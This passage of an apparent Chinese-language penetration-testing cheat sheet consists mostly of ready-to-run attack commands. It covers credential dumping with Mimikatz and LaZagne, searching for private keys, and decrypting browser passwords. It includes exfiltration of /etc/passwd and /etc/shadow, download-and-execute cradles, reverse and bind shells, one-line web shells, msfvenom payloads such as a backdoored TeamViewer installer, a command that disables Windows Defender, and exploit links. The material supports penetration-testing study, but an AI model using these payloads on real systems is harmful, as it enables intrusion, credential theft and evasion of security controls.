2>/dev/null | grep -v "lib|fonts|share|core" ;done $ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done ``` - Grep ``` $ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" $ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" $ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" $ grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null ``` - Cron ``` $ cat /etc/crontab $ ls -la /etc/cron.*/ $ cat /etc/cron.daily $ cat /etc/cron.hourly $ cat /etc/cron.monthly $ cat /etc/cron.weekly $ cat /etc/cron.d ``` - Mimipenguin ``` $ python3 mimipenguin.py $ bash mimipenguin.sh ``` - Lazange ``` $ python2.7 lazagne.py all $ python3 lazagne.py browsers C:\> start LaZagne.exe all ``` - Firefox 凭据 ``` $ ls -l .mozilla/firefox/ | grep default $ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . ``` - Firefox_decrypt ``` https://github.com/unode/firefox_decrypt $ python3.9 firefox_decrypt.py ``` - 解密 Chrome 密码 ``` [$ python3.9 firefox_decrypt.py](https://github.com/ohyicong/decrypt-chrome-passwords) ``` - Mimikatz ``` C:\> mimikatz.exe mimikatz # privilege::debug mimikatz # token::elevate mimikatz # lsadump::sam mimikatz # lsadump::lsa /patch mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::tickets mimikatz # kerberos::list mimikatz # kerberos::list /export mimikatz # kerberos::purge mimikatz # sekurlsa::credman mimikatz # vault::cred mimikatz # sekurlsa::ekeys mimikatz # misc::cmd ``` - DPAPI ``` C:\> mimikatz.exe mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect ``` - Opasswd 旧密码 ``` $ sudo cat /etc/security/opasswd ``` - Bash 历史记录 ``` $ cat .bash_history ``` - Bashrc ``` $ cat .bashrc ``` - Bash Profile ``` $ cat .bash_profile ``` ## #8. - 文件传输 - Base64 下载 (Kali -> Windows) ``` $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("")) PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` - Base64 下载 (Kali -> Linux) ``` $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo $ echo -n '' | base64 -d > id_rsa $ md5sum id_rsa ``` - Base64 上传 (Windows -> Kali) ``` PS C:\> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) $ echo | base64 -d > hosts $ md5sum hosts ``` - Base64 上传 (Linux -> Kali) ``` $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo $ echo -n '' | base64 -d > id_rsa $ md5sum id_rsa ``` - Netcat 下载 (Kali -> Windows) ``` $ sudo nc -nlvp -q 0 443 < file.txt C:\> nc.exe -nv 443 > file.txt $ sudo nc -nlvp 443 > file.txt C:\> nc.exe -q 0 443 < file.txt ``` - Ncat 下载 (Kali -> Linux) ``` $ sudo ncat -nlvp 443 --send-only < file.txt $ ncat 443 --recv-only > file.txt OR $ cat < /dev/tcp//443 > file.txt $ sudo ncat -nlvp 443 --recv-only > file.txt $ ncat --send-only 443 < file.txt ``` - Netcat 上传 (Windows -> Kali) ``` C:\> nc.exe -nlvp 443 -q 0 < file.txt $ nc -nv 443 > file.txt C:\> nc.exe -nlvp 443 > file.txt $ nc -q 0 443 < file.txt ``` - Python Web 上传 (Linux -> Kali) ``` $ sudo python3 -m pip install --user uploadserver $ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' $ mkdir https && cd https $ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem $ curl -X POST https:///upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` - Python3 服务器 (Kali -> Windows/Kali) ``` $ python3 -m http.server 8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash ``` - Python3 下载 (Kali -> Linux) ``` $ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' ``` - Python3 上传 (Linux -> Kali) ``` $ python3 -m uploadserver $ python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' ``` - Python2.7 服务器 (Kali -> Windows/Kali) ``` $ python2.7 -m SimpleHTTPServer 8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash ``` - Python2.7 下载 (Kali -> Linux) ``` $ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' ``` - PHP 服务器 (Kali -> Linux) ``` $ php -S 0.0.0.0:8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash ``` - PHP 下载 (Kali -> Linux) ``` $ php -r '$file = file_get_contents("http://:8000/exploit.sh"); file_put_contents("exploit.sh",$file);' $ php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' $ php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` - Ruby 服务器 (Kali -> Linux) ``` $ ruby -run -ehttpd . -p8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash ``` - Ruby 下载 (Kali -> Linux) ``` $ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' ``` - Perl 下载 (Kali -> Linux) ``` $ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' ``` - SCP 下载 (Kali -> Windows) ``` $ sudo systemctl enable ssh $ sudo systemctl start ssh $ scp @:/tmp/exploit.exe C:\Temp\exploit.exe ``` - SCP 下载 (Kali -> Linux) ``` $ sudo systemctl enable ssh $ sudo systemctl start ssh $ scp @:/tmp/exploit.sh . ``` - SCP 上传 (Windows -> Kali) ``` C:\> scp C:\Temp\exploit.exe @:/tmp/exploit.exe ``` - SCP 上传 (Linux -> Kali) ``` C:\> scp /tmp/exploit.sh @:/tmp/exploit.sh ``` - OpenSSL 下载 (Kali -> Linux) ``` $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem $ openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh $ openssl s_client -connect :80 -quiet > LinEnum.sh ``` - OpenSSL 加密下载 (Kali -> Linux) ``` $ openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc $ openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd ``` - Nginx 上传 (Linux -> Kali) ``` $ sudo mkdir -p /var/www/uploads/SecretUploadDirectory $ sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory # 通过创建文件 /etc/nginx/sites-available/upload.conf 并填入以下内容来创建 Nginx 配置文件 server { listen 9001; location /SecretUploadDirectory/ { root /var/www/uploads; dav_methods PUT; } } $ sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/ $ sudo systemctl restart nginx.service $ tail -2 /var/log/nginx/error.log $ ss -lnpt | grep 80 $ ps -ef | grep $ sudo rm /etc/nginx/sites-enabled/default $ curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt $ sudo tail -1 /var/www/uploads/SecretUploadDirectory/users.txt ``` - PowerShell DownloadFile (Kali -> Windows) ``` PS C:\> (New-Object Net.WebClient).DownloadFile('http://:8000/exploit.ps1','C:\Users\Public\Downloads\exploit.ps1') C:\> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http:///exploit.exe','C:\Users\Offsec\Desktop\new-exploit.exe')" ``` - PowerShell Invoke-WebRequest (Kali -> Windows) <_BLOCK_189/> - PowerShell WinHTTPRequest (Kali -> Windows) ``` PS C:\> $h=new-object -com WinHttp.WinHttpRequest.5.1; PS C:\> $h.open('GET','http:///nc.exe',$false); PS C:\> $h.send(); PS C:\> iex $h.ResponseText ``` - Msxml2 (Kali -> Windows) ``` PS C:\> $h=New-Object -ComObject Msxml2.XMLHTTP; PS C:\> $h.open('GET','http:///nc.exe',$false); PS C:\> $h.send(); PS C:\> iex $h.responseText ``` - PowerShell DownloadString (Download & Execute Cradle - Fileless) (Kali -> Windows) ``` PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://:8000/exploit.ps1') https://gist.github.com/HarmJ0y/bb48307ffa663256e239 ``` - PowerShell Web 上传 (Windows -> Kali) ``` $ pip3 install uploadserver $ python3 -m uploadserver PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\> Invoke-FileUpload -Uri http:///upload -File C:\Windows\System32\drivers\etc\hosts ``` - PowerShell Base64 Web 上传 (Windows -> Kali) ``` PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\> Invoke-WebRequest -Uri http://:443/ -Method POST -Body $b64s $ nc -nlvp 8000 $ echo | base64 -d -w 0 > hosts ``` - PowerShell 远程执行 (Windows -> Windows) ``` PS C:\> Test-NetConnection -ComputerName -Port 5985 PS C:\> $Session = New-PSSession -ComputerName PS C:\> Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ PS C:\> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session ``` - PowerShell 加密下载 (Kali -> Windows) ``` # https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1 PS C:\> Import-Module .\Invoke-AESEncryption.ps1 PS C:\> Invoke-AESEncryption -Mode Encrypt -Key "" -Path .\scan-results.txt ``` - SMB 下载 (Kali -> Windows) ``` $ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test C:\> net use n: \\\smbshare /user:test test C:\> copy n:\exploit.exe OR C:\> copy \\\a\whoami.exe C:\Windows\Temp\whoami.exe OR $ smbserver.py a /usr/share/windows-binaries/ $ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support MyShare /tmp C:\> move sam.save \\\MyShare ``` - SMB 上传 WebDav (Windows -> Kali) ``` $ sudo pip3 install wsgidav cheroot $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous C:\> dir \\\DavWWWRoot C:\> copy C:\Users\Public\Downloads\exploit.exe \\\DavWWWRoot\ ``` - FTP 下载 (Kali -> Windows) ``` $ sudo pip3 install pyftpdlib $ sudo python3 -m pyftpdlib --port 21 PS C:\> (New-Object Net.WebClient).DownloadFile('ftp:///file.txt', 'C:\Users\Public\ftp-file.txt') ``` - FTP 上传 (Windows -> Kali) ``` $ sudo python3 -m pyftpdlib --port 21 --write PS C:\> (New-Object Net.WebClient).UploadFile('ftp:///ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` - FTP 下载(非交互式) (Kali -> Windows) ``` C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo GET file.txt >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\>cat file.txt This is a test file ``` - FTP 上传(非交互式) (Windows -> Kali) ``` C:\> echo open 192.168.49.128 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ``` - Wget (Kali -> Linux) ``` $ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh $ wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 ``` - Curl (Kali -> Linux) ``` $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /tmp/LinEnum.sh $ curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash ``` - Bash (/dev/tcp) (Kali -> Linux) ``` $ exec 3<>/dev/tcp/10.10.10.32/80 $ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 $ cat <&3 ``` - Bitsadmin (Kali -> Windows) ``` C:\> bitsadmin /transfer n http:///exploit.exe C:\Temp\exploit.exe PS C:\> bitsadmin /transfer wcb /priority foreground http://:8000/nc.exe C:\Users\Administrator\Desktop\nc.exe PS C:\> Import-Module bitstransfer; Start-BitsTransfer -Source "http://:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe" PS C:\> Import-Module bitstransfer; PS C:\> Start-BitsTransfer 'http:///nc.exe' $env:temp\t; PS C:\> $r=gc $env:temp\t; PS C:\> rm $env:temp\t; PS C:\> iex $r ``` - CertReq (https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe) (Windows -> Kali) ``` C:\> certreq.exe -Post -config http://:8000/ c:\Temp\exploit.exe $ sudo nc -lvnp 8000 ``` - Certutil (Kali -> Windows) ``` C:\> certutil.exe -urlcache -split -f http:///exploit.exe C:\> certutil.exe -verifyctl -split -f http:///exploit.exe ``` - GfxDownloadWrapper.exe (Kali -> Windows) ``` PS C:\> GfxDownloadWrapper.exe "http:///nc.exe" "C:\Temp\nc.exe" ``` - JavaScript (cscript.exe) 下载 (Kali -> Windows) ``` # 保存为 wget.js var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); C:\> cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 ``` - VBScript (cscript.exe) 下载 (Kali -> Windows) ``` # 保存为 wget.vbs dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with C:\> cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 ``` - Rdesktop (Windows -> Windows) ``` $ rdesktop -d -u -p '' -r disk:linux='/home/user/rdesktop/files' Browse to \\tsclient\ or use mstsc.exe -> Local Resources -> More -> Drives ``` - Xfreerdp (Windows -> Windows) - HTTP User-Agents ``` https://useragentstring.com/index.php https://useragentstring.com/pages/useragentstring.php PS C:\>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl PS C:\> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome PS C:\> Invoke-WebRequest http:///nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` - SMBClient 批量下载脚本 ``` SERVER="" USER="\\" PASS="" for share in $(smbclient -L $SERVER -U $USER%$PASS 2>/dev/null | awk '/Disk/ {print $1}'); do echo "[+] Downloading $share ..." mkdir -p "$share" smbclient //$SERVER/$share -U $USER%$PASS -c "recurse ON; prompt OFF; lcd \"$share\"; mget *" done ``` ## #9. - 受限 Shell 逃逸 - Shell 逃逸 ``` $ /bin/sh -i $ bash -i $ echo os.system('/bin/bash') $ python -c 'import pty; pty.spawn("/bin/bash")' $ python3 -c 'import pty;pty.spawn("/bin/bash")' $ script /dev/null -c bash $ perl —e 'exec "/bin/sh";' $ perl: exec "/bin/sh"; $ ruby: exec "/bin/sh" $ lua: os.execute('/bin/sh') $ awk 'BEGIN {system("/bin/sh")}' $ find / -name nameoffile 'exec /bin/awk 'BEGIN {system("/bin/sh")}' \; $ find . -exec /bin/sh \; -quit $ vim -c ':!/bin/sh' ``` - Tab 自动补全 ``` $ CTRL+Z $ stty raw -echo $ fg $ reset $ export TERM=xterm-256color $ stty rows 67 columns 318 ``` ## #10. - Shell - 绑定 Shell ``` https://www.revshells.com/ $ nc -nlvp -e /bin/bash $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f $ python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("",));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' $ powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(); ``` - 反向 Shell ``` https://www.revshells.com/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md $ nc -nv -e /bin/bash msf6 > use multi/handler $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f $ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 $ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' $ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 $ socat file:`tty`,raw,echo=0 tcp-listen:4444 $ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp::4444 msf> use exploit/multi/handler ``` - Web Shell ``` https://github.com/jbarcia/Web-Shells/tree/master/laudanum https://github.com/samratashok/nishang/tree/master/Antak-WebShell https://github.com/WhiteWinterWolf/wwwolf-php-webshell PHP: JSP: <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> ASP: <% eval request("cmd") %> ``` - 默认 Webroot 位置 ``` Apache: /var/www/html/ Nginx: /usr/local/nginx/html/ IIS: c:\inetpub\wwwroot\ XAMPP: C:\xampp\htdocs\ ``` - MSFvenom ``` http://pentestmonkey.net/tools/web-shells/php-reverse-shell Edit IP address and port $ msfvenom -l payloads $ msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php $ msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp $ msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp $ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o shell.exe $ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell.elf $ msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho $ msfvenom windows/x86/meterpreter_reverse_tcp LHOST= LPORT= -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5 ``` ## #11. - 绕过 - 禁用 Windows Defender ``` PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true ``` ## #12. - 在线资源 - Speedguide ``` https://www.speedguide.net/port.php?port=3389 ``` - CrackStation ``` https://crackstation.net/ ``` - Living Off The Land Binaries, Scripts and Libraries (LOLBAS) ``` https://lolbas-project.github.io/ ``` - GTFOBins ``` https://gtfobins.github.io/ ``` ## #13. - 浏览器插件 - Wappalyzer: 网站技术分析器 ``` https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ ``` - Cookie 编辑器:编辑 Cookie ``` https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/ ``` - FoxyProxy:代理管理 ``` https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ ``` ## #14. - 利用工具 - MS17-010 ``` https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py $ ./zzz_exploit.py ntsvcs https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py https://github.com/3ndG4me/AutoBlue-MS17-010 ``` - MS08-067 ``` https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py ``` - CVE-2007-2447 ``` https://github.com/amriunix/CVE-2007-2447 ``` - PHP 8.1.0-dev 后门远程代码执行 ``` https://github.com/flast101/php-8.1.0-dev-backdoor-rce ``` - CVE-2021-4034 ``` https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py ``` ## #15. - 利用研究 - CVEdetails ``` https://www.cvedetails.com/ ``` - Exploit DB ``` https://www.exploit-db.com/ ``` - Vulners ``` https://vulners.com/ ``` - Rapid7 ``` https://www.rapid7.com/db/ ``` - 漏洞实验室 ``` https://www.vulnerability-lab.com/ ``` - Packet Storm Security ``` https://packetstormsecurity.com/ ``` - NIST ``` https://nvd.nist.gov/vuln/search?execution=e2s1 ```
标签:AI合规, API接口, Cutter, Evasion, Google Dork, Nessus, Nessus安装, Nessus服务启动, Nmap, Nmap banner抓取, Nmap扫描技术, Nmap操作系统探测, Nmap数据包跟踪, Nmap欺骗, Nmap源端口欺骗, Nmap漏洞扫描, Nmap版本探测, Nmap脚本, Nmap输出格式, Nmap随机诱饵, PE 加载器, PoC, Shell管理, Shell绕过, StruQ, Whois查询, XSLT处理, 主动枚举, 主机安全, 云存储桶搜索, 协议分析, 受限Shell, 后渗透, 在线资源, 威胁模拟, 安全测试, 密码管理, 密码转储, 应用安全, 搜索代码, 攻击性安全, 数据包嗅探, 文件传输, 文档结构分析, 无线安全, 暴力破解, 权限提升, 枚举, 横向移动, 流量绕过, 浏览器插件, 渗透测试清单, 编程规范, 网络信息收集, 网络安全, 网络安全审计, 虚拟驱动器, 被动枚举, 证书搜索, 逆向工具, 隐私保护